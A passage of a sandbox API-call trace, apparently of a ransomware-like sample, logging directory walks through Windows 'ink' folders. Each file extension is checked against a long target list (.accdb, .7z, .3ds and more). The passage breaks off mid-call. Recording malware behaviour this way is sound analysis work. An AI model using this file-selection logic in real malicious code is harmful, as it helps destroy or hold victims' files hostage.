lstrlenW (lpString=".pub") returned 4 [0286.307] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".pwm") returned 4 [0286.307] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".pxr") returned 4 [0286.307] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.307] lstrlenW (lpString=".py") returned 3 [0286.307] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.307] lstrlenW (lpString=".qt") returned 3 [0286.307] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.307] lstrlenW (lpString=".r3d") returned 4 [0286.307] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.307] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0286.308] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.308] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0286.308] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0286.308] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4047ec8 [0286.308] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.933] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0553f37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0286.933] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0286.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.525] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0287.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.525] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0287.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.525] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0287.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.526] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0287.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.526] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0557085, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0287.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.526] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dd09d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8231541, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0287.528] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.528] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05ddf5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0287.528] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.528] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0287.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.529] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0287.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.529] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0287.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.529] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0287.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.529] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0287.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.529] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0637839, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0287.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.530] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0287.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.530] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0287.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.530] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0287.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.533] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadda, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="main.xml", cAlternateFileName="")) returned 1 [0287.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.533] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskclearui.xml", cAlternateFileName="")) returned 1 [0287.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.533] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskmenu.xml", cAlternateFileName="")) returned 1 [0287.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.533] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0287.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.533] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="osknumpad.xml", cAlternateFileName="")) returned 1 [0287.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.534] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0287.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.534] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0287.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.534] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0287.534] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.534] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0287.535] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.535] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0287.535] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.535] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0287.535] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0287.535] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0287.535] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4c6f90, Size=0x4000) returned 0x401cd60 [0287.536] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipschs.xml", cAlternateFileName="")) returned 1 [0287.536] lstrlenW (lpString="ipschs.xml") returned 10 [0287.536] lstrlenW (lpString=".1cd") returned 4 [0287.536] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.536] lstrlenW (lpString=".3ds") returned 4 [0287.536] lstrcmpiW (lpString1=".3ds", lpString2=".xml") returned -1 [0287.536] lstrlenW (lpString=".3fr") returned 4 [0287.536] lstrcmpiW (lpString1=".3fr", lpString2=".xml") returned -1 [0287.536] lstrlenW (lpString=".3g2") returned 4 [0287.536] lstrcmpiW (lpString1=".3g2", lpString2=".xml") returned -1 [0287.536] lstrlenW (lpString=".3gp") returned 4 [0287.536] lstrcmpiW (lpString1=".3gp", lpString2=".xml") returned -1 [0287.536] lstrlenW (lpString=".7z") returned 3 [0287.536] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.536] lstrlenW (lpString=".accda") returned 6 [0287.536] lstrcmpiW (lpString1=".accda", lpString2="hs.xml") returned -1 [0287.537] lstrlenW (lpString=".accdb") returned 6 [0287.537] lstrcmpiW (lpString1=".accdb", lpString2="hs.xml") returned -1 [0287.537] lstrlenW (lpString=".accdc") returned 6 [0287.537] lstrcmpiW (lpString1=".accdc", lpString2="hs.xml") returned -1 [0287.537] lstrlenW (lpString=".accde") returned 6 [0287.537] lstrcmpiW (lpString1=".accde", lpString2="hs.xml") returned -1 [0287.537] lstrlenW (lpString=".accdt") returned 6 [0287.537] lstrcmpiW (lpString1=".accdt", lpString2="hs.xml") returned -1 [0287.538] lstrlenW (lpString=".accdw") returned 6 [0287.538] lstrcmpiW (lpString1=".accdw", lpString2="hs.xml") returned -1 [0287.538] lstrlenW (lpString=".adb") returned 4 [0287.538] lstrcmpiW (lpString1=".adb", lpString2=".xml") returned -1 [0287.538] lstrlenW (lpString=".adp") returned 4 [0287.538] lstrcmpiW (lpString1=".adp", lpString2=".xml") returned -1 [0287.538] lstrlenW (lpString=".ai") returned 3 [0287.538] lstrcmpiW (lpString1=".ai", lpString2="xml") returned -1 [0287.538] lstrlenW (lpString=".ai3") returned 4 [0287.538] lstrcmpiW (lpString1=".ai3", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ai4") returned 4 [0287.539] lstrcmpiW (lpString1=".ai4", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ai5") returned 4 [0287.539] lstrcmpiW (lpString1=".ai5", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ai6") returned 4 [0287.539] lstrcmpiW (lpString1=".ai6", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ai7") returned 4 [0287.539] lstrcmpiW (lpString1=".ai7", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".ai8") returned 4 [0287.539] lstrcmpiW (lpString1=".ai8", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".anim") returned 5 [0287.539] lstrcmpiW (lpString1=".anim", lpString2="s.xml") returned -1 [0287.539] lstrlenW (lpString=".arw") returned 4 [0287.539] lstrcmpiW (lpString1=".arw", lpString2=".xml") returned -1 [0287.539] lstrlenW (lpString=".as") returned 3 [0287.539] lstrcmpiW (lpString1=".as", lpString2="xml") returned -1 [0287.539] lstrlenW (lpString=".asa") returned 4 [0287.539] lstrcmpiW (lpString1=".asa", 